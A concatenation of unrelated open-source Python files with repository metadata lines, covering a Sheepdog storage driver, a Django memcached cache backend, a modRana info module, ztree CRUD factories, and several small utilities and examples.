sd_vdi_delete.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_delete.restype = c_int
sd_vdi_open = libshared.sd_vdi_open
sd_vdi_open.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_open.restype = c_void_p
sd_vdi_close = libshared.sd_vdi_close
sd_vdi_close.argtypes = [c_void_p]
sd_vdi_close.restype = c_int
sd_vdi_read = libshared.sd_vdi_read
sd_vdi_read.argtypes = [c_void_p, c_void_p, c_ulonglong, c_ulonglong]
sd_vdi_read.restype = c_int
sd_vdi_write = libshared.sd_vdi_write
sd_vdi_write.argtypes = [c_void_p, c_void_p, c_ulonglong, c_ulonglong]
sd_vdi_write.restype = c_int
sd_vdi_snapshot = libshared.sd_vdi_snapshot
sd_vdi_snapshot.argtypes = [c_void_p, c_char_p, c_char_p]
sd_vdi_snapshot.restype = c_int
sd_vdi_clone = libshared.sd_vdi_clone
sd_vdi_clone.argtypes = [c_void_p, c_char_p, c_char_p, c_char_p]
sd_vdi_clone.restype = c_int
sd_vdi_getsize = libshared.sd_vdi_getsize
sd_vdi_getsize.argtypes = [c_void_p]
sd_vdi_getsize.restype = c_ulong
sd_vdi_resize = libshared.sd_vdi_resize
sd_vdi_resize.argtypes = [c_void_p, c_char_p, c_ulong]
sd_vdi_resize.restype = c_int
class sheepdog_driver():
'''the sheepdog driver class.
@connection: a connection to the sheepdog server.
:each method of the class may raise a SheepdogException.
'''
def __init__(self, connection):
self.connection = connection
'''Disconnect to the sheepdog cluster.'''
def disconnect(self):
err_code = sd_disconnect(self.connection)
if err_code != 0:
err_handle(err_code)
'''Create a logic volume in the sheepdog cluster.
@name: the name of the volume to be created.
@size: the size(Byte) of the volume to be created.
'''
def create(self, name, size):
err_code = sd_vdi_create(self.connection, name, size)
if err_code != 0:
err_handle(err_code)
'''Delete a logic volume in the sheepdog cluster.
@name: the name of the volume to be deleted
@tag: the snapshot tag of the volume, to delete a volume(not a snapshot), set tag to NULL. A volume
can have many snapshots, the tag is used to identify the different snapshot.
'''
def delete(self, name, tag):
err_code = sd_vdi_delete(self.connection, name, tag)
if err_code != 0:
err_handle(err_code)
'''Open the named volume.
@name: the name of the volume to be opened.
@tag: snapshot tag of the volume to be opened, if the volume is not snapshot, set tag to NULL.
:returns: the volume descritor.
'''
def open(self, name, tag):
vd = sd_vdi_open(self.connection, name, tag)
if vd ==None:
raise SheepdogException('open specified volume name:%s tag:%s error.'%(name,tag))
return vd
'''Close a volume that the volume descritor point to.
@vd: the volume descritor.
'''
def close(self, vd):
err_code = sd_vdi_close(vd)
if err_code != 0:
err_handle(err_code)
'''Read from a volume at a given offset.
@vd: the volume descritor.
@size: how many bytes we want to read.
@offset: the start of the volume we try to read.
:returns: the read data.
'''
def read(self, vd, size, offset):
buffer = create_string_buffer(size)
err_code = sd_vdi_read(vd, buffer, size, offset)
if err_code != 0:
err_handle(err_code)
return buffer.raw
'''Write data to a volume at a given offset.
@vd: the volume descritor.
@size: how many bytes we want to write.
@offset: the start of the volume we try to write.
@data: the data to be write.
'''
def write(self, vd, data, size, offset):
err_code = sd_vdi_write(vd, data, size, offset)
if err_code != 0:
err_handle(err_code)
'''Take a snapshot of a volume.
@name: the name of the volume to snapshot
@tag: specify a tag of the snapshot
'''
def snapshot(self, name, tag):
err_code = sd_vdi_snapshot(self.connection, name, tag)
if err_code != 0:
err_handle(err_code)
''' Clone a new volume from a snapshot.
@srcname: the source volume name.
@srctag: the source tag of the snapshot.
@dstname: the destination volume name.
:Only snapshot can be cloned.
'''
def clone(self, srcname, srctag, dstname):
err_code = sd_vdi_clone(self.connection, srcname, srctag, dstname)
if err_code != 0:
err_handle(err_code)
def getsize(self, vd):
return sd_vdi_getsize(vd)
def resize(self, name, new_size):
err_code = sd_vdi_resize(self.connection, name, new_size)
if (err_code != 0):
err_handle(err_code)
'''Connect to the Sheepdog cluster.
@server_host: the sheepdog server, a combination of ip and port , default value is '127.0.0.1:7000'.
:returns: an object of sheepdog_driver.
:a SheepdogException will be raised if connect error.
'''
def connect(server_host='127.0.0.1:7000'):
connection = sd_connect(server_host)
if connection == None:
raise SheepdogException('connect to sheepdog server %s error.'%server_host)
return sheepdog_driver(connection)
| liuy/sheepdog-ng | lib/shared/sheepdog.py | Python | gpl-2.0 | 7,707 |
#encoding=utf-8
__author__ = 'yang'
import jieba
import sys
reload(sys)
sys.setdefaultencoding('utf8')
def application(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
body = environ['PATH_INFO'][1:]
l = jieba.cut(body,cut_all=False)
r = '--'.join(l)
return [r.encode('utf-8')]
| ningmo/pynote | fenci/fenci.py | Python | agpl-3.0 | 339 |
import array
import ctypes
import os
import struct
import sys
import win32api
import win32con
import win32gui
from pytank.Elements import ComboBox,Edit,getListboxItems,ListView,SendKeys,Control,findControls,RightClickMenu,ListBox
from pytank.Applications import *
from pytank.Buttons import *
from pytank.SystemFunctions import sleep,Type,Press
import os
import array
import ctypes
import os
import struct
import sys
import win32api
import win32con
import win32gui
from pytank.Elements import ComboBox,Edit,getListboxItems,ListView,SendKeys,Control,findControls,RightClickMenu
from pytank.Applications import *
from pytank.Buttons import *
from pytank.SystemFunctions import sleep,Type,Press,Ping
import pywinauto
import os
ControllerIPAddress = '192.168.10.55'
while True:
if Ping(ControllerIPAddress):
print 'Found'
sleep(10)
break
else:
pass
list = os.listdir("C:\\updates")
list.sort(reverse=True)
string = "C:\\updates\\" + str(list[0])
os.startfile(string)
gUpgrade_selectthesystemyouwouldliketoupgrade.Wait(3000)
sleep(10)
ListBox.Select(gUpgrade.GetHandle(),'SC F8-57-2E-00-00-EA')
gUpgrade.Focus()
sleep(5)
Control.Click(gUpgrade.GetHandle(),'Start')
Control.Click(HLUPGRADE.GetHandle(),'Yes')
sleep(10)
BACKUP_systemversion.WaitVanish()
sleep(10)
Upgrading_totalprogress.WaitVanish()
HLUPGRADE_softwareupdateonsystemcontrollercomplete.Wait(30)
Control.Click(HLUPGRADE.GetHandle(),'OK')
sleep(10) | kenshay/ImageScript | ProgramData/SystemFiles/Python/Lib/site-packages/elan/__OLD_SCRIPTS/runnner_Upgrade.py | Python | gpl-3.0 | 1,481 |
#!/usr/bin/env python
# encoding: utf-8
"""Find and (optionally) delete corrupt Whisper data files"""
from __future__ import absolute_import, print_function, unicode_literals
import argparse
import os
import sys
import whisper
def walk_dir(base_dir, delete_corrupt=False, verbose=False):
for dirpath, dirnames, filenames in os.walk(base_dir):
if verbose:
print("Scanning %s…" % dirpath)
whisper_files = (os.path.join(dirpath, i) for i in filenames if i.endswith('.wsp'))
for f in whisper_files:
try:
info = whisper.info(f)
except whisper.CorruptWhisperFile:
if delete_corrupt:
print('Deleting corrupt Whisper file: %s' % f, file=sys.stderr)
os.unlink(f)
else:
print('Corrupt Whisper file: %s' % f, file=sys.stderr)
continue
if verbose:
print('%s: %d points' % (f, sum(i['points'] for i in info.get('archives', {}))))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=__doc__.strip())
parser.add_argument('--delete-corrupt', default=False, action='store_true',
help='Delete reported files')
parser.add_argument('--verbose', default=False, action='store_true',
help='Display progress info')
parser.add_argument('directories', type=str, nargs='+',
metavar='WHISPER_DIR',
help='Directory containing Whisper files')
args = parser.parse_args()
for d in args.directories:
d = os.path.realpath(d)
if not os.path.isdir(d):
parser.error("%d is not a directory!")
walk_dir(d, delete_corrupt=args.delete_corrupt, verbose=args.verbose)
| kerlandsson/whisper | bin/find-corrupt-whisper-files.py | Python | apache-2.0 | 1,830 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "LinearTrend", cycle_length = 5, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 0); | antoinecarme/pyaf | tests/artificial/transf_Quantization/trend_LinearTrend/cycle_5/ar_/test_artificial_1024_Quantization_LinearTrend_5__20.py | Python | bsd-3-clause | 270 |
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------
# A modRana module providing various kinds of information.
#----------------------------------------------------------------------------
# Copyright 2007, Oliver White
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#---------------------------------------------------------------------------
from modules.base_module import RanaModule
from core.point import Point
import math
from core import geo
def getModule(*args, **kwargs):
return Info(*args, **kwargs)
class Info(RanaModule):
"""A modRana information handling module"""
def __init__(self, *args, **kwargs):
RanaModule.__init__(self, *args, **kwargs)
self.versionString = "unknown version"
currentVersionString = self.modrana.paths.getVersionString()
if currentVersionString is not None:
# check version string validity
self.versionString = currentVersionString
self._dirPoint = None
dirPoint = self.get("directionPointLatLon", None)
if dirPoint:
lat, lon = dirPoint
self._dirPoint = Point(lat, lon)
def getPayPalUrl(self):
return "https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=martin%2ekolman%40gmail%2ecom&lc=CZ&item_name=The%20modRana%20project¤cy_code=EUR&bn=PP%2dDonationsBF%3abtn_donate_LG%2egif%3aNonHosted"
def getFlattrUrl(self):
return "https://flattr.com/thing/678708/modRana-flexible-GPS-navigation-system"
def getGratipayUrl(self):
return "https://gratipay.com/M4rtinK"
def getBitcoinAddress(self):
return "14DXzkqqYCfSG5vZNYPnPiZzg3wW2hXsE8"
def getDiscussionUrls(self):
"""
return a list of modRana-relevant discussions, with the most relevant discussion on top
"""
return [("http://talk.maemo.org/showthread.php?t=58861", "talk.maemo.org thread")]
def getMainDiscussionUrl(self):
"""
return Url to the most relevant modRana discussion
"""
return self.getDiscussionUrls()[0]
def getWebsiteUrl(self):
"""
return Url to the modRana website
"""
return "http://www.modrana.org"
def getSourceRepositoryUrl(self):
return "https://github.com/M4rtinK/modrana"
def getEmailAddress(self):
"""
return the project email address
"""
return "[email protected]"
def getAboutText(self):
www = self.getWebsiteUrl()
email = self.getEmailAddress()
source = self.getSourceRepositoryUrl()
discussion, name = self.getDiscussionUrls()[0]
text = "<p><b>main developer:</b> Martin Kolman</p>"
text += '<p><b>email</b>: <a href="mailto:%s">%s</a></p>' % (email, email)
text += '<p><b>www</b>: <a href="%s">%s</a></p>' % (www, www)
text += '<p><b>source</b>:\n<a href="%s">%s</a></p>' % (source, source)
text += '<p><b>discussion</b>: check <a href="%s">%s</a></p>' % (discussion, name)
return text
def drawMenu(self, cr, menuName, args=None):
if menuName == 'infoAbout':
menus = self.m.get('menu', None)
if menus:
button1 = ('Discussion', 'generic', "ms:menu:openUrl:%s" % self.getDiscussionUrls()[0][0])
button2 = ('Donate', 'generic', "ms:menu:openUrl:%s" % self.getPayPalUrl())
web = " <u>www.modrana.org</u> "
email = " [email protected] "
text = "modRana version:\n\n%s\n\n\n\nFor questions or feedback,\n\ncontact the <b>modRana</b> project:\n\n%s\n\n%s\n\n" % (
self.versionString, web, email)
box = (text, "ms:menu:openUrl:http://www.modrana.org")
menus.drawThreePlusOneMenu(cr, 'infoAbout', 'set:menu:info', button1, button2, box)
elif menuName == "infoDirection":
menus = self.m.get('menu', None)
if menus:
button1 = ('set point', 'generic', "info:setPoint")
button2 = ('clear', 'generic', "info:clearPoint")
boxText = "no point selected"
if self._dirPoint:
lat = self._dirPoint.lat
lon = self._dirPoint.lon
boxText= "lat: <b>%f</b> lon: <b>%f</b>" % (lat, lon)
# if possible, add distance information
units = self.m.get("units", None)
pos = self.get("pos", None)
if pos and units:
lat1, lon1 = pos
distance = geo.distance(lat, lon, lat1, lon1)*1000
distance, shortUnit, longUnit = units.humanRound(distance)
boxText+=" %s %s" % (str(distance), shortUnit)
box = (boxText, "")
# draw the buttons and main box background
menus.drawThreePlusOneMenu(cr, 'infoDirection', 'set:menu:info', button1, button2, box)
# get coordinates for the box
(e1, e2, e3, e4, alloc) = menus.threePlusOneMenuCoords()
# upper left corner XY
(x4, y4) = e4
# width and height
(w, h, dx, dy) = alloc
w4 = w - x4
h4 = h - y4
# draw the direction indicator
axisX = x4 + w4/2.0
axisY = y4 + h4/2.0
# shortest side
shortestSide = min(w4,h4)
# usable side - 10% border
side = shortestSide*0.7
angle = self._getDirectionAngle()
self._drawDirectionIndicator(cr, axisX, axisY, side, angle)
def handleMessage(self, message, messageType, args):
if message == "setPoint":
# open the coordinates entry dialog
entry = self.m.get('textEntry', None)
if entry:
initialText = ""
dirPoint = self.get("directionPointLatLon", None)
if dirPoint:
initialText = "%f,%f" % dirPoint
entry.entryBox(self, 'directionPointCoordinates', 'Coordinates (Example: 1.23,4.56)', initialText=initialText)
elif message == "clearPoint":
self._dirPoint = None
self.set("directionPointLatLon" ,None)
def handleTextEntryResult(self, key, result):
if key == 'directionPointCoordinates':
try:
lat, lon = result.split(",")
lat = float(lat)
lon = float(lon)
self.log.info("Direction coordinates %f,%f", lat, lon)
self._dirPoint = Point(lat, lon)
self.set("directionPointLatLon", (lat, lon))
except Exception:
self.log.exception("direction point coordinate parsing failed")
# from SGTL
# TODO: move to appropriate place
def _bearingTo(self, pos, target, currentBearing):
lat1 = math.radians(pos.lat)
lat2 = math.radians(target.lat)
lon1 = math.radians(pos.lon)
lon2 = math.radians(target.lon)
dlon = math.radians(target.lon - pos.lon)
y = math.sin(dlon) * math.cos(lat2)
x = math.cos(lat1) * math.sin(lat2) - math.sin(lat1)*math.cos(lat2)*math.cos(dlon)
bearing = math.degrees(math.atan2(y, x))
bearing = (-180 + currentBearing - bearing) % 360
return bearing
def _getDirectionAngle(self):
angle = 0.0
pos = self.get("pos", None)
bearing = self.get("bearing", None)
if pos and bearing is not None and self._dirPoint:
lat, lon = pos
posPoint = Point(lat, lon)
angle = self._bearingTo(posPoint, self._dirPoint, bearing)
return angle
def _drawDirectionIndicator(self, cr, x1, y1, side, angle):
# looks like some of the menu drawing functions does not
# call stroke() at the end of drawing
# TODO: find which one is it and remove stroke() from here
cr.stroke()
cr.set_source_rgb(1.0, 1.0, 0.0)
cr.save()
cr.translate(x1, y1)
cr.rotate(math.radians(angle))
# inside area
cr.move_to(0, side/2.0) # tip of the arrow
cr.line_to(-side/3.0, -side/2.0) # left extreme
cr.line_to(0, -side/5.0) # arrow inset
cr.line_to(side/3.0, -side/2.0) # right extreme
cr.fill()
cr.set_source_rgb(0.0, 0.0, 0.0)
cr.set_line_width(6)
cr.move_to(0, side/2.0) # tip of the arrow
cr.line_to(-side/3.0, -side/2.0) # left extreme
cr.line_to(0, -side/5.0) # arrow inset
cr.line_to(side/3.0, -side/2.0) # right extreme
cr.close_path()
cr.stroke()
# draw middle indicator
cr.set_source_rgb(0.0, 0.0, 0.0)
cr.arc(0, 0, 16, 0, 2.0 * math.pi)
cr.fill()
cr.restore()
#
#cr.set_source_rgb(1.0, 1.0, 0.0)
#cr.save()
#cr.translate(x1, y1)
#cr.rotate(math.radians(angle))
#cr.move_to(-10, 15)
#cr.line_to(10, 15)
#cr.line_to(0, -15)
#cr.fill()
#cr.set_source_rgb(0.0, 0.0, 0.0)
#cr.set_line_width(3)
#cr.move_to(-10, 15)
#cr.line_to(10, 15)
#cr.line_to(0, -15)
#cr.close_path()
#cr.stroke()
#cr.restore() | ryfx/modrana | modules/mod_info.py | Python | gpl-3.0 | 10,055 |
"Memcached cache backend"
import pickle
import re
import time
from django.core.cache.backends.base import DEFAULT_TIMEOUT, BaseCache
from django.utils.functional import cached_property
class BaseMemcachedCache(BaseCache):
def __init__(self, server, params, library, value_not_found_exception):
super().__init__(params)
if isinstance(server, str):
self._servers = re.split('[;,]', server)
else:
self._servers = server
# The exception type to catch from the underlying library for a key
# that was not found. This is a ValueError for python-memcache,
# pylibmc.NotFound for pylibmc, and cmemcache will return None without
# raising an exception.
self.LibraryValueNotFoundException = value_not_found_exception
self._lib = library
self._options = params.get('OPTIONS') or {}
@property
def _cache(self):
"""
Implement transparent thread-safe access to a memcached client.
"""
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers, **self._options)
return self._client
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
if timeout is None:
# Using 0 in memcache sets a non-expiring timeout.
return 0
elif int(timeout) == 0:
# Other cache backends treat 0 as set-and-expire. To achieve this
# in memcache backends, a negative timeout must be passed.
timeout = -1
if timeout > 2592000: # 60*60*24*30, 30 days
# See https://github.com/memcached/memcached/wiki/Programming#expiration
# "Expiration times can be set from 0, meaning "never expire", to
# 30 days. Any time higher than 30 days is interpreted as a Unix
# timestamp date. If you want to expire an object on January 1st of
# next year, this is how you do that."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return int(timeout)
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.add(key, value, self.get_backend_timeout(timeout))
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
return self._cache.get(key, default)
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if not self._cache.set(key, value, self.get_backend_timeout(timeout)):
# make sure the key doesn't keep its old value in case of failure to set (memcached's 1MB limit)
self._cache.delete(key)
def delete(self, key, version=None):
key = self.make_key(key, version=version)
return bool(self._cache.delete(key))
def get_many(self, keys, version=None):
key_map = {self.make_key(key, version=version): key for key in keys}
ret = self._cache.get_multi(key_map.keys())
return {key_map[k]: v for k, v in ret.items()}
def close(self, **kwargs):
# Many clients don't clean up connections properly.
self._cache.disconnect_all()
def incr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.decr(key, -delta)
try:
val = self._cache.incr(key, delta)
# python-memcache responds to incr on nonexistent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def decr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.incr(key, -delta)
try:
val = self._cache.decr(key, delta)
# python-memcache responds to incr on nonexistent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def set_many(self, data, timeout=DEFAULT_TIMEOUT, version=None):
safe_data = {}
original_keys = {}
for key, value in data.items():
safe_key = self.make_key(key, version=version)
safe_data[safe_key] = value
original_keys[safe_key] = key
failed_keys = self._cache.set_multi(safe_data, self.get_backend_timeout(timeout))
return [original_keys[k] for k in failed_keys]
def delete_many(self, keys, version=None):
self._cache.delete_multi(self.make_key(key, version=version) for key in keys)
def clear(self):
self._cache.flush_all()
class MemcachedCache(BaseMemcachedCache):
"An implementation of a cache binding using python-memcached"
def __init__(self, server, params):
import memcache
super().__init__(server, params, library=memcache, value_not_found_exception=ValueError)
@property
def _cache(self):
if getattr(self, '_client', None) is None:
client_kwargs = {'pickleProtocol': pickle.HIGHEST_PROTOCOL}
client_kwargs.update(self._options)
self._client = self._lib.Client(self._servers, **client_kwargs)
return self._client
def touch(self, key, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.touch(key, self.get_backend_timeout(timeout)) != 0
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
val = self._cache.get(key)
# python-memcached doesn't support default values in get().
# https://github.com/linsomniac/python-memcached/issues/159
# Remove this method if that issue is fixed.
if val is None:
return default
return val
def delete(self, key, version=None):
# python-memcached's delete() returns True when key doesn't exist.
# https://github.com/linsomniac/python-memcached/issues/170
# Call _deletetouch() without the NOT_FOUND in expected results.
key = self.make_key(key, version=version)
return bool(self._cache._deletetouch([b'DELETED'], 'delete', key))
class PyLibMCCache(BaseMemcachedCache):
"An implementation of a cache binding using pylibmc"
def __init__(self, server, params):
import pylibmc
super().__init__(server, params, library=pylibmc, value_not_found_exception=pylibmc.NotFound)
@cached_property
def _cache(self):
return self._lib.Client(self._servers, **self._options)
def touch(self, key, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if timeout == 0:
return self._cache.delete(key)
return self._cache.touch(key, self.get_backend_timeout(timeout))
def close(self, **kwargs):
# libmemcached manages its own connections. Don't call disconnect_all()
# as it resets the failover state and creates unnecessary reconnects.
pass
| theo-l/django | django/core/cache/backends/memcached.py | Python | bsd-3-clause | 7,977 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Example program integrating an IVP problem of van der Pol oscillator
"""
from __future__ import (absolute_import, division, print_function)
import numpy as np
from pygslodeiv2 import integrate_adaptive, integrate_predefined
def get_f_and_j(mu):
def f(t, y, dydt):
dydt[0] = y[1]
dydt[1] = -y[0] + mu*y[1]*(1 - y[0]**2)
def j(t, y, Jmat, dfdt):
Jmat[0, 0] = 0
Jmat[0, 1] = 1
Jmat[1, 0] = -1 - mu*2*y[1]*y[0]
Jmat[1, 1] = mu*(1 - y[0]**2)
dfdt[:] = 0
return f, j
def integrate_ivp(u0=1.0, v0=0.0, mu=1.0, tend=10.0, dt0=1e-8, nt=0,
t0=0.0, atol=1e-8, rtol=1e-8, plot=False, savefig='None',
method='bsimp', dpi=100, verbose=False):
f, j = get_f_and_j(mu)
if nt > 1:
tout = np.linspace(t0, tend, nt)
yout, info = integrate_predefined(
f, j, [u0, v0], tout, dt0, atol, rtol,
check_indexing=False, method=method)
else:
tout, yout, info = integrate_adaptive(
f, j, [u0, v0], t0, tend, dt0, atol, rtol,
check_indexing=False, method=method) # dfdt[:] also for len == 1
if verbose:
print(info)
if plot:
import matplotlib.pyplot as plt
plt.plot(tout, yout)
if savefig == 'None':
plt.show()
else:
plt.savefig(savefig, dpi=dpi)
if __name__ == '__main__':
try:
import argh
argh.dispatch_command(integrate_ivp)
except ImportError:
integrate_ivp()
| bjodah/pygslodeiv2 | examples/van_der_pol.py | Python | gpl-3.0 | 1,587 |
from .__about__ import __version__
from .portworx import PortworxCheck
__all__ = ['__version__', 'PortworxCheck']
| DataDog/integrations-extras | portworx/datadog_checks/portworx/__init__.py | Python | bsd-3-clause | 115 |
from django.template.defaultfilters import slugify
from ztree.models import Node
#from ztree.signals import tree_content_created, tree_content_updated
from ztree.utils import filter_and_clean_fields, dispatch_request_json
from ztreecrud.component.slugutils import SlugUtil
from akuna.component import get_component
from akuna.component.errors import ComponentDoesNotExist
import logging
logger = logging.getLogger('ztreecrud')
def create_node_factory(sender, **kwargs):
logger.debug('in node factory, kwargs: %s' % str(kwargs))
parent_node = kwargs.get('parent_node')
username = kwargs.get('username')
slug = kwargs.get('slug')
seq_num = kwargs.get('seq_num')
if not parent_node:
logger.debug('parent_node not set assuming site root')
parent_node = None
if not username:
#XXX how fatal is this, ok to proceed??
logger.error('username not set')
logger.debug('received slug: %s' % slug)
if not slug:
#XXX raise error 'slug' not set, serious problem
# rollback content creation
logger.error('slug could not be set')
return None
logger.debug('slug: ' + slug)
# create new node
node = Node(parent=parent_node, slug=slug, content_object=sender,
content_created_by=username, content_modified_by=username, seq_num=seq_num)
node.save()
logger.debug("node " + node.get_absolute_url() + " created")
return node
#XXX already have a node - so sender could be a node
#def update_node_factory(sender, **kwargs):
def update_node_factory(node, **kwargs):
logger.debug('in node factory')
username = kwargs.get('username')
if not username:
#XXX is this a fatal problem
logger.error('username not set')
logger.debug('updating node username - ' + username)
#node = sender.node
node.content_modified_by = username
node.save()
return node
class GenericCreateFactory(object):
def __call__(self, request, create_content_type, **kwargs):
logger.debug('creating obj of type: "%s"' % str(create_content_type))
create_content_type_name = create_content_type.app_label + '.' + create_content_type.model
try:
create_factory = get_component('TreeContentCreateFactory', name=create_content_type_name)
new_content_object = create_factory(request, create_content_type, **kwargs)
except ComponentDoesNotExist:
# generic content creation
filtered_data = filter_and_clean_fields(create_content_type, **kwargs)
model_class = create_content_type.model_class()
new_content_object = model_class(**filtered_data)
new_content_object.save()
## need to create tree node ##
# calc node slug
try:
slugutil = get_component('SlugUtil', name=create_content_type_name)
slug = slugutil.calc_slug(new_content_object, request, **kwargs)
except ComponentDoesNotExist:
# generic slug
slug = SlugUtil.calc_slug(new_content_object, request, **kwargs)
# node can also be ordered by seq_num
seq_num = kwargs.get('seq_num')
parent_node = request.tree_context.node
if hasattr(request, 'user'):
username = request.user.username
else:
# if serving backend tree web service, no auth and no request.user
username = kwargs.get('authenticated_username')
#XXX send signal creating node, do we need this, this possibly the only place
# node created, could invoke it directly
#tree_content_created.send(sender=new_content_object, parent_node=parent_node, username=username, slug=slug, seq_num=seq_num)
new_node = create_node_factory(new_content_object, parent_node=parent_node, username=username, slug=slug, seq_num=seq_num)
#logger.debug("object created")
#XXX is signal processing asynchronos, node might not be created,
# is it expensive referencing it here, do we need to return
# aNSwER: yes we need to check node created to rollback if it didn't
# or during node creating we need to raise some kind of exception which would
# trigger rollback
#return new_content_object.node
return new_node
class GenericUpdateFactory(object):
def __call__(self, request, content_object, **kwargs):
logger.debug('Updating object: "%s"' % str(content_object))
try:
# specific update factory component hook
update_factory = get_component('TreeContentUpdateFactory', (content_object,))
update_factory(request, content_object, **kwargs)
except ComponentDoesNotExist:
# generic content object update
filtered_data = filter_and_clean_fields(request.tree_context.node.content_type, **kwargs)
logger.debug("filtered_data: " + str(filtered_data) )
content_object.__dict__.update(**filtered_data)
content_object.save()
if hasattr(request, 'user'):
username = request.user.username
else:
# if serving backend tree web service, no auth and no request.user
username = kwargs.get('authenticated_username')
#XXX do we need to recalculate slug??
# probably not as it changes node absolute_path
# any cached urls to the page..
#XXX send signal updated node, do we need this, this possibly the only place
# node upated, could invoke it directly
#tree_content_updated.send(sender=content_object, username=username)
updated_node = update_node_factory(content_object.node, username=username)
#return request.tree_context.node
return updated_node
class GenericDeleteFactory(object):
#XXX potential problem here where Generic rec not deleted and concrete deleted
# (or is it other way around)
def __call__(self, request, content_object, **kwargs):
logger.info('Deleting object: "%s"' % str(content_object))
try:
# specific delete factory component hook
delete_factory = get_component('TreeContentDeleteFactory', (content_object,))
delete_factory(request, content_object, **kwargs)
except ComponentDoesNotExist:
content_object.delete()
request.tree_context.node.delete()
return 1
import urllib
import urllib2
from django.conf import settings
from ztree.serializers import deserialize_node
class RemoteCreateFactory(object):
"""Remote TreeContent Content Factory - web service client.
Calls the web service 'content_factory' to create new `TreeContent` content object.
"""
def __call__(self, request, create_content_type, **kwargs):
content_type_name = create_content_type.app_label + '.' + create_content_type.model
submit_data = {'ct': content_type_name,
'authenticated_username': request.user.username,
#'slug': slug,
}
submit_data.update(kwargs)
if request.tree_context.node:
ws_create_content_uri = settings.ZTREE_WS_BASE_URL \
+ request.tree_context.node.absolute_path + '/create'
else:
ws_create_content_uri = settings.ZTREE_WS_BASE_URL + '/create'
resp = dispatch_request_json(ws_create_content_uri, method='POST', data=submit_data)
return deserialize_node(resp)
class RemoteUpdateFactory(object):
"""Web Service Update TreeContent Content Factory.
Calls the web service 'content_factory' to update `TreeContent` content object.
"""
#def __call__(self, node, update_data, username):
def __call__(self, request, content_object, **kwargs):
submit_data = {'authenticated_username': request.user.username}
submit_data.update(kwargs)
ws_update_content_uri = settings.ZTREE_WS_BASE_URL + request.tree_context.node.absolute_path + '/update'
resp = dispatch_request_json(ws_update_content_uri, method='POST', data=submit_data)
return deserialize_node(resp)
#from django.utils import simplejson
#from StringIO import StringIO
from rest_framework.compat import BytesIO
from rest_framework.parsers import JSONParser
class RemoteDeleteFactory(object):
"""Web Service Delete TreeContent Content Factory.
Calls the web service 'content_factory' to update `TreeContent` content object.
"""
#def __call__(self, node, username):
def __call__(self, request, content_object, **kwargs):
submit_data = {'authenticated_username': request.user.username}
ws_delete_content_uri = settings.ZTREE_WS_BASE_URL + request.tree_context.node.absolute_path + '/delete'
resp = dispatch_request_json(ws_delete_content_uri, method='POST', data=submit_data)
#resp_py = simplejson.load(StringIO(resp))
resp_py = JSONParser().parse( BytesIO(resp) )
if resp_py.get('status'):
return 1
return 0
| stana/django-ztree | ztreecrud/component/factories.py | Python | mit | 9,111 |
#!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# SvnPubSub - Simple Push Notification of Subversion commits
#
# Based on the theory behind the Live Journal Atom Streaming Service:
# <http://atom.services.livejournal.com/>
#
# Instead of using a complicated XMPP/AMPQ/JMS/super messaging service,
# we have simple HTTP GETs and PUTs to get data in and out.
#
# Currently supports both XML and JSON serialization.
#
# Example Sub clients:
# curl -sN http://127.0.0.1:2069/commits
# curl -sN http://127.0.0.1:2069/commits/svn/*
# curl -sN http://127.0.0.1:2069/commits/svn
# curl -sN http://127.0.0.1:2069/commits/*/13f79535-47bb-0310-9956-ffa450edef68
# curl -sN http://127.0.0.1:2069/commits/svn/13f79535-47bb-0310-9956-ffa450edef68
#
# URL is built into 2 parts:
# /commits/${optional_type}/${optional_repository}
#
